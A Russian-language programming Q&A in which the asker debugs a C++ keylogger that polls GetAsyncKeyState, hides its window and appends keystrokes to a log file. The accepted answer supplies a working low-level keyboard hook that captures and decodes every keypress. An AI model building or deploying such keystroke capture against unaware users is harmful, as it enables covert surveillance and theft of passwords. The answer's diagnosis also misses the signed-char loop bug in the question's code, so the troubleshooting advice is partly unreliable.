# Virtual-key codes, в файл не записываются несколько клавиш

Tags: c++, winapi

Пишу кейлоггер (в познавательных целях). Использую GetAsyncKeyState и коды клавиш. Пока использую английскую раскладку. Все клавиши записываются нормально, кроме тех, которые на скрине. Т.е. после запуска проги и жмакания по ним в текстовик ничего не записывается, но с остальными клавишами таких проблем нет. Собсна, почему так происходит? Коды не соответствуют?(проверял много раз)

```
#include "pch.h"
#include <iostream>
#include <windows.h>
#include <fstream>
#include <string>


using namespace std;

bool is_capslock = false;
int BackSp = 0;

int save(int key)
{
    ofstream out_file;
    out_file.open("logs.txt", ios_base::app);
    string Logs = "";


    switch (key)
    {
    case 189:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "_";
        }
        else
            Logs += "-";
        break;
    case 187:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "+";
        }
        else
            Logs += "=";
        break;
    case 219:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "{";
        }
        else
            Logs += "[";
        break;
    case 221:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "}";
        }
        else
            Logs += "]";
        break;
    case 186:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += ":";
        }
        else
            Logs += ";";
        break;
    case 222:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "\"";
        }
        else
            Logs += "'";
        break;
    case 220:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "|";
        }
        else
            Logs += "\\";
        break;
    case 188:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "<";
        }
        else
            Logs += ",";
        break;
    case 190:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += ">";
        }
        else
            Logs += ".";
        break;
    case 191:
        BackSp = 0;
        if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
            Logs += "?";
        }
        else
            Logs += "/";
        break;
    default:
        break;
    }

    out_file << Logs;
    out_file.close();
    return 0;
}

int main(int argc, char * argv[])
{
    //autorun();
    stealth();

    char buffer[MAX_PATH];
    GetModuleFileNameA(NULL, buffer, MAX_PATH);

    char i;
    while (1)
    {
        for (i = 8; i <= 190; i++)
        {
            if (GetAsyncKeyState(i) == -32767)
                save(i);
        }
    }
    return(0);
}
```

[image: скрин]

Answer (score 3, accepted):

Во первых, неправильно реализована проверка результата GetAsyncKeyState. Правильно должно быть как-то так:

```
if ((GetAsyncKeyState(i) & 0x8000) != 0){
    //...
}
```

Во вторых, вызывать в цикле GetAsyncKeyState только для отлова нажатия клавиш - так себе идея, вместо этого нужно использовать специальное средство, клавиатурный хук. То же самое можно сказать про гигантский switch с проверкой все возможных кодов спецсимволов, для этого есть специальные функции, MapVirtualKey и ToUnicodeEx. Все это уже [многократно](https://ru.stackoverflow.com/questions/926187/%D0%92%D1%8B%D1%81%D0%BE%D0%BA%D0%B0%D1%8F-%D0%BD%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%B0-%D0%BD%D0%B0-%D0%A6%D0%9F-%D0%BF%D1%80%D0%B8-%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B8-%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B) [обсуждалось](https://ru.stackoverflow.com/questions/767999/getkeyboardstate-%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5-%D1%81%D0%BE%D1%81%D1%82%D0%BE%D1%8F%D0%BD%D0%B8%D1%8F-%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D1%88%D0%B8?noredirect=1&lq=1).

Пример:

```
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

wchar_t VKCodeToUnicode(UINT vkCode)
{
    BYTE keyboardState[255]="";
    wchar_t buf[5] = L"";

    short x;
    byte y;

    for (int i = 0; i < 255; i++)
    {
        if (i == VK_CAPITAL)
        {
            x = GetKeyState(i);
        }
        else
        {
            x = GetAsyncKeyState(i);
        }
        y = 0;
        if ((x & 0x8000) != 0) y = (BYTE)(y | 0x80);
        if ((x & 0x0001) != 0) y = (BYTE)(y | 0x01);
        keyboardState[i] = y;
    }

    ToUnicodeEx(vkCode, MapVirtualKey(vkCode, 0), keyboardState, buf, 5, 0,
        GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), nullptr)));
    return buf[0];
}

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{

    if (nCode == HC_ACTION)
    {
        switch (wParam)
        {
        case WM_KEYDOWN:
            PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT)lParam;
            wchar_t c = VKCodeToUnicode(p->vkCode);
            wprintf(L"%lc\n",c);
            break;
        }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

int main(int argc, char* argv[])
{

    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, 0, 0);
    if (hook == NULL) {
        printf("Failed to install keyboard hook!\n");
        getchar();
        return 1;
    }   

    MSG msg;
    while (!GetMessage(&msg, NULL, NULL, NULL)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    return 0;
}
```

Comment: Да я знаю что у меня кривая прога получается, но я хочу реализовать именно этим способом. Я тут почитал, что для клавиши ;: походу нет кода. (http://archives.miloush.net/michkap/archive/2005/12/01/498775.html)  Это зависит уже от стандарта клавиатуры. Даже на MSDN написано "Used for miscellaneous characters; it can vary by keyboard.
For the US standard keyboard, the ';:' key - VK_OEM_1 или 0xBA".

Comment: @Hellios Да, значение многих клавиш определяется раскладкой. Вы можете использовать функцию VkKeyScanEx (https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-vkkeyscanexa), чтобы перейти от символов к кодам клавиш в заданной раскладке. Или просто сделайте в моем примере вывод на экран `p->vkCode`, а потом нажимайте по очереди все клавиши и записывайте их коды.